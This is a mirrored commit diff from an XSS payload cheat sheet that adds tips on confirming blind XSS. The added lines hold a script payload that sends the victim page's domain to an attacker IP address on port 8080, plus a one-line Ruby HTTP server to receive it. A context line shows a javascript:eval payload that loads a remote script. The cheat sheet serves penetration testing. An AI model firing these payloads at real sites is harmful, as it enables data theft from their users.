mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
Merge pull request #376 from noraj/patch-2
XSS: add quick tips for bXSS
This commit is contained in:
commit
62b897c936
@ -452,6 +452,22 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
|||||||
- Comment Box
|
- Comment Box
|
||||||
- Administrative Panel
|
- Administrative Panel
|
||||||
|
|
||||||
|
### Tips
|
||||||
|
|
||||||
|
You can use [Data grabber for XSS](#data-grabber-for-xss) and a one-line HTTP server to confirm the existence of a blind XSS before deploying an heavy blind XSS platform.
|
||||||
|
|
||||||
|
Eg. payload
|
||||||
|
|
||||||
|
```html
|
||||||
|
<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
Eg. one-line HTTP server:
|
||||||
|
|
||||||
|
```
|
||||||
|
$ ruby -run -ehttpd . -p8080
|
||||||
|
```
|
||||||
|
|
||||||
## Mutated XSS
|
## Mutated XSS
|
||||||
|
|
||||||
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
|
Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
|
||||||
|
Loading…
Reference in New Issue
Block a user